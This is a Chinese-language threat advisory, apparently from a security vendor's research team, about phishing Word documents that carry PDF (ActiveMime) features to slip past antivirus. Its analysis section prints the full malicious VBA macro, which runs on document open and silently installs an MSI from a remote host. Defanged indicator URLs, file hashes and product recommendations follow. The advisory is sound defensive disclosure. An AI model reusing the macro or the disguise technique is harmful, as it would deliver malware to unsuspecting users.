攻击描述
近期,山石网科情报中心发现了一批恶意DOC文件,这些文件采用了巧妙的伪装技术,能够有针对性地绕过杀毒软件的文件检测。恶意攻击者利用MIME格式嵌入了PDF文件(ActiveMime)到Word文档中,以传播携带恶意代码的文档文件。这些文档具有PDF文件的格式特征,导致杀毒软件、EPP(终端点防护)和EDR(终端威胁检测与响应)等安全产品使用PDF逻辑进行处理。但与此同时,被攻击的用户可以使用OFFICE工具打开这些文档,从而具有非常强的免疫杀毒软件的效果。
简要分析
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Label11, 1, 0, MSForms, Label"
Attribute VB_Control = "Label1, 0, 1, MSForms, Label"
Private Sub Document_Open()
On Error Resume Next
Dim office As Object
Set office = CreateObject("WindowsInstaller.Installer")
office.UILevel = 2
abc = "https://web365metrics[.]com/files/69fbd341bcf4f734fd47f72710021ae6839/plugin[.]msi"
office.InstallProduct abc
End Sub
处置建议
用户可以通过使用山石网科的防火墙和NIPS产品,利用其C2和AV防护模块来提高网络安全,从而降低潜在风险。为确保最佳保护,用户应及时升级特征库,确保其包含截至2023年9月4日的最新安全特征信息。山石网科的防火墙不仅提供了先进的网络安全防护功能,还集成了态势感知云景的智能能力,可以高效地监测和拦截与APT组织相关的威胁情报(IOC)和恶意行为。此外,它还能够快速响应和拦截与当前安全趋势、安全事件和相关样本有关的威胁。
失陷指标
718148a5712c1fec7b50acc89eee2aa0
cba6bd373e42a7bcbc4c7251bc188b69
d537f8b812a3902b90aa16281aa1314b
hxxxs://web365metrics[.]com/files/69fbd341bcf4f734fd47f72710021ae6839/MicrosoftOffiice[.]Hub[.]msi
hxxxs://web365metrics[.]com/files/69fbd341bcf4f734fd47f72710021ae6839/plugin[.]msi
hxxxs://cloudmetricsapp[.]com/wp-content/uploads/docs/addin[.]msi
关于山石网科情报中心
山石网科情报中心,涵盖威胁情报狩猎运维和入侵检测与防御团队。 山石网科情报中心专注于保护数字世界的安全。以情报狩猎、攻击溯源和威胁分析为核心,团队致力于预防潜在攻击、应对安全事件。山石网科情报中心汇集网络安全、计算机科学、数据分析等专家,多学科融合确保全面的威胁分析。我们积极创新,采用新工具和技术提升分析效率。团队协同合作,分享信息与见解,追求卓越,为客户保驾护航。无论是防范未来威胁还是应对当下攻击,我们努力确保数字世界安全稳定。其中山石网科网络入侵检测防御系统,是山石网科公司结合多年应用安全的攻防理论和应急响应实践经验积累的基础上自主研发完成,满足各类法律法规如 PCI、等级保护、企业内部控制规范等要求。
山石云瞻威胁情报中心:
https://ti.hillstonenet.com.cn/
山石云影沙箱:
https://sandbox.hillstonenet.com.cn/
原文始发于微信公众号(山石网科安全技术研究院):警惕携带PDF特征的Word文件钓鱼攻击